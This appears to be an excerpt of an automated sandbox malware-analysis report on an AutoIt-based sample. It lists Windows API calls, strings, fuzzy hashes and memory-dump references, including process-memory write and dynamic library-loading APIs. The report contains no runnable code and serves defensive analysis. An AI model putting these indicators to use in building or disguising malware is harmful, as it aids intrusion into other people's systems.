                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00007FF7BB850EDB
                                                                                                                      • Part of subcall function 00007FF7BB850B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7BB850F61), ref: 00007FF7BB850C6A
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharForegroundUpperWindow
                                                                                                                    • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                                                    • API String ID: 3570115564-1994484594
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: #$E$O
                                                                                                                    • API String ID: 3215553584-248080428
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 3196045410-1173974218
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 787153527-1403004172
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                     • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3740051246-0
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D176
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D217
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D236
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D281
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D2A0
                                                                                                                      • Part of subcall function 00007FF7BB804120: WideCharToMultiByte.KERNEL32 ref: 00007FF7BB804160
                                                                                                                      • Part of subcall function 00007FF7BB804120: WideCharToMultiByte.KERNEL32 ref: 00007FF7BB80419C
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 666041331-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2939132127-0
                                                                                                                    • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction ID: cb223f050ccb5b6578b413a1b7f1aacbfe184742bfc66a24e9015998b9e510f5
                                                                                                                    • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction Fuzzy Hash: D1516122A0978A85FF509B2DD864278B760FB96B44FA85136CF8D47278CE3DF451C760
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2256411358-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2655805287-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2067211477-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1156100317-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2117695475-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB86003C
                                                                                                                    • TerminateThread.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB860047
                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB860055
                                                                                                                    • ~SyncLockT.VCCORLIB ref: 00007FF7BB86005E
                                                                                                                      • Part of subcall function 00007FF7BB85F7B8: CloseHandle.KERNEL32(?,?,?,00007FF7BB860063,?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB85F7C9
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7BB8429AD,?,?,?,00007FF7BB7F2AB2), ref: 00007FF7BB86006A
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3142591903-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611280651-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 948891078-24824748
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: $*
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID: !$asin
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                    • String ID: U
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateObjectStock
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                    • String ID: %lu
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                                                    • String ID: %s%d
                                                                                                                    • API String ID: 2330185562-1110647743
                                                                                                                    • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                    • Instruction ID: c4e024778f159e09c42289080ab1bd08ec907a35b2540f5370d0ca5bdab53f6b
                                                                                                                    • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                    • Instruction Fuzzy Hash: 70218031608B8295EA24EB2DE4542FAA365BF5ABC0F844035DF9D07779DE2CE115C7A0
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB842DD1), ref: 00007FF7BB87AF37
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB842DD1), ref: 00007FF7BB87AF4F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1816364905
                                                                                                                    • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                                    • Instruction ID: 9c45ac5652aacddc477e89805c9735b69684d49a8cf24196e0869d5dcdc98d67
                                                                                                                    • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                                    • Instruction Fuzzy Hash: 4CF0FE61905B0581EF14EB6DD444364A3E4FB29B49FC40435DE5D01378EF7DE5A8C390
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                    • Instruction ID: 3f41a357fe8e02719e41e4a0dbfb9c722c2491a4c0a016933e5b7bdad4f13161
                                                                                                                    • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                    • Instruction Fuzzy Hash: 6FE0C925905B0691EF14AB6DE81836863A0BB2AB48FC41435DE5D45368EF7CE5B8C390
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                    • Instruction ID: 71077238843454e888a8e1fa821813a3836165bd28e1329d7b1566aaa34d9638
                                                                                                                    • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                    • Instruction Fuzzy Hash: 76E06D25A05B02C2EF15AB2CE8183A8A3A0FB2AB05FC41435DE1C41368EF7DE5B5C390
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                    • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                                                    • Instruction ID: a6c0f944d667a216ad6d8d2896b25cb0cf076949c653b22e00b84d14864c3a3c
                                                                                                                    • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                                                    • Instruction Fuzzy Hash: 4FE0C921905B0681EF15EB6DE4183A863A4BB2AB48FC41435CE5D4537CEF7CE5A49290
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                    • Instruction ID: 39588eb8d0d85811551e98dcdf9e2cc1e617e7abe6aee822525c65d3e9373f41
                                                                                                                    • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                    • Instruction Fuzzy Hash: 32E0C921905F0681EF15EB6DE4183A863A4BB2AB48FC41835DE5D45378EFBCE5A4D390
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                    • Instruction ID: ecf54955101c920a3d8f6565b3ab17314e583bfd56e654dcff15cff56fa372e7
                                                                                                                    • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                    • Instruction Fuzzy Hash: 0FD10566B04B568AEB14DF2EC4502AC77B0FB99F88B514422DF4D47B68DF39D864C3A0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                    • Instruction ID: 93426fdd253c5a408d50e7d0707395cdf903075c98252e3b720126bf64218efd
                                                                                                                    • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                    • Instruction Fuzzy Hash: 02D14B66B04B419AEB10EBA9D4801EC73B5FB69788B804436DF0D57B79DF38E529C390
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2000298826-0
                                                                                                                    • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                                                    • Instruction ID: 4630adfbd510b196dec654dc48319743c460f6bd5b64191ad7feee80dbd0ea69
                                                                                                                    • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                                                    • Instruction Fuzzy Hash: 61719F32A18B8186E700EB69D4043AEA7A4FB99B88F804132EF4D07779DF7CE545C750
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1249313431-0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
• Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
